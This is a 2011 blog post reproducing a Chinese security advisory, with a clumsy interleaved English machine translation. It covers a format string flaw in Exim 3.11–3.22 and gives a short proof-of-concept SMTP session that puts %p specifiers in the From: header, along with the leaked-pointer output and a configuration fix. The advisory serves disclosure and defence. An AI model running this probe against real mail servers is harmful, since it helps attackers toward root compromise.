Pages

Sabtu, 12 November 2011

远程攻击者利用exim格式化字符串漏洞取得系统特权 Exim remote attackers to obtain system privileges to format string vulnerabilities 详细:

详细: Details:

Exim ( http://www.exim.org ) 是一个广为应用的邮件服务器,在许多LINUX 版本中都含有软件。 Exim (http://www.exim.org) is a widely used mail server, in many LINUX versions contain the software. 它能提供邮件传输代理(MTA)功能。 It provides mail transfer agent (MTA) function. 但是发现它存在格式化字符串漏洞。 But found that it exists format string vulnerabilities. 如果exim 以root 权限运行的话,远程者利用此漏洞可能取得系统特权。 If exim is running as root, then exploited this vulnerability could remotely obtain system privileges.

它的配置文件是/etc/exim.conf,如果打开了"headers_check_syntax" 选项,则当邮件中的"From:'地址栏中包含主机名格式串时,将会导致格式串溢出。攻击者利用此漏洞能在受影响机器上以root 特权执行任意代码。以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负. Its configuration file is / etc / exim.conf, if you open the "headers_check_syntax" option, when the message in the "From: 'address field contains the host name of the format string, it will result in the format string overflow attacks exploit This vulnerability in the affected machine to execute arbitrary code with root privileges. The following code is used only to test and research this loophole, if you use it for improper way to please your own risk.

Try this: Try this:

===8<======8<=======8<====== === 8 <====== 8 <======= 8 <======

lez:~$ /usr/sbin/exim -bS lez: ~ $ / usr / sbin / exim-bS

mail from:lez@lez mail from: lez @ lez

rcpt to:hax0r@lez rcpt to: hax0r @ lez

data data

From:@@%p%p%p%p%p%p%p%p%p%p From: @ @% p% p% p% p% p% p% p% p% p% p


.. ..

===8<======8<=======8<======= === 8 <====== 8 <======= 8 <=======


Somewhere in the answers you should see: Somewhere in the answers you should see:

550 Syntax error in 'From' header: domain missing or malformed: failing 550 Syntax error in 'From' header: domain missing or malformed: failing
address is: address is:

@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40 @ @ 0x80beba00x804d2690x80be6600x80be6680x80bd050 (nil) (nil) (nil) (nil) 0x80b9d40


受影响系统: The affected system:

University of Cambridge Exim 3.22 University of Cambridge Exim 3.22

University of Cambridge Exim 3.21 University of Cambridge Exim 3.21

University of Cambridge Exim 3.20 University of Cambridge Exim 3.20

University of Cambridge Exim 3.19 University of Cambridge Exim 3.19

University of Cambridge Exim 3.18 University of Cambridge Exim 3.18

University of Cambridge Exim 3.17 University of Cambridge Exim 3.17

University of Cambridge Exim 3.16 University of Cambridge Exim 3.16

University of Cambridge Exim 3.15 University of Cambridge Exim 3.15

University of Cambridge Exim 3.14 University of Cambridge Exim 3.14

University of Cambridge Exim 3.13 University of Cambridge Exim 3.13

University of Cambridge Exim 3.12 University of Cambridge Exim 3.12

University of Cambridge Exim 3.11 University of Cambridge Exim 3.11

解决方案: 请用户在'/etc/exim.conf' 中注释掉"headers_check_syntax" Solution: Users '/ etc / exim.conf' comment out "headers_check_syntax"

Tidak ada komentar:

Posting Komentar